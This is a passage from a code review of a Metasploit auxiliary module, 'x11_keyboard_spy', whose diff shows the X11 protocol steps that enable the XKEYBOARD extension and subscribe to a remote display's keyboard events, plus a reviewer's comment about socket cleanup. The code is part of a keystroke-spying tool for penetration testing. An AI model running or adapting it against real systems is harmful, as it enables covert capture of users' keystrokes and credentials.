modules/auxiliary/gather/x11_keyboard_spy.rb

```diff
@@ -0,0 +1,262 @@
+    vprint_status("Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
+    vprint_status("Resource ID: #{connection.resource_id_base.inspect}")
+    vprint_status("Screen root: #{connection.screen_root.inspect}")
+
+    vprint_status('(2/9) Checking on BIG-REQUESTS extension')
+    sock.put(QUERYEXTENSION.new(extension: 'BIG-REQUESTS', unused2: query_extension_calls).to_binary_s) # check if BIG-REQUESTS exist, not sure why
+    query_extension_calls += 1
+    big_requests_plugin = process_extension_query(sock.get_once(-1, 1), 'BIG-REQUESTS')
+
+    vprint_status('(3/9) Enabling BIG-REQUESTS')
+    sock.put(EXTENSIONTOGGLE.new(opcode: big_requests_plugin.major_opcode).to_binary_s) # not sure why we do this
+    sock.get_once(-1, 1)
+
+    vprint_status('(4/9) Creating new graphical context')
+    sock.put(X11CREATEGRAPHICALCONTEXTREQUEST.new(cid: connection.resource_id_base,
+                                                  drawable: connection.screen_root,
+                                                  gc_value_mask_background: 1).to_binary_s +
+             X11GETPROPERTYREQUEST.new(window: connection.screen_root).to_binary_s) # not sure why we do this
+    sock.get_once(-1, 1)
+
+    vprint_status('(5/9) Checking on XKEYBOARD extension')
+    sock.put(QUERYEXTENSION.new(extension: 'XKEYBOARD', unused2: query_extension_calls).to_binary_s) # check if XKEYBOARD exist, not sure why
+    xkeyboard_plugin = process_extension_query(sock.get_once(-1, 1), 'XKEYBOARD')
+
+    vprint_status('(6/9) Enabling XKEYBOARD')
+    sock.put(EXTENSIONTOGGLE.new(opcode: xkeyboard_plugin.major_opcode, wanted_major: 1).to_binary_s) # use keyboard
+    sock.get_once(-1, 1)
+
+    vprint_status('(7/9) Requesting XKEYBOARD map')
+    sock.put(GETMAPREQUEST.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+                               full_key_types: 1,
+                               full_key_syms: 1,
+                               full_modifier_map: 1).to_binary_s) # not sure what this does
+    map_data = GETMAPREPLY.read(sock.get_once(-1, 1))
+
+    vprint_status('(8/9) Enabling notification on keyboard and map')
+    sock.put(SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+                              affect_which_new_keyboard_notify: 1,
+                              affect_new_keyboard_key_codes: 1,
+                              affect_new_keyboard_device_id: 1).to_binary_s +
+            SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+                             affect_which_map_notify: 1,
+                             affect_map_key_types: 1,
+                             affect_map_key_syms: 1,
+                             affect_map_modifier_map: 1,
+                             map_key_types: 1,
+                             map_key_syms: 1,
+                             map_modifier_map: 1).to_binary_s) # not sure what this does
+    sock.get_once(-1, 1)
```

Comment:
I believe this can `raise` an exception, and we should potentially `begin/rescue` it to ensure we clean up the socket.

Reply:
this request wasn't actually receiving data turns out, so its now removed.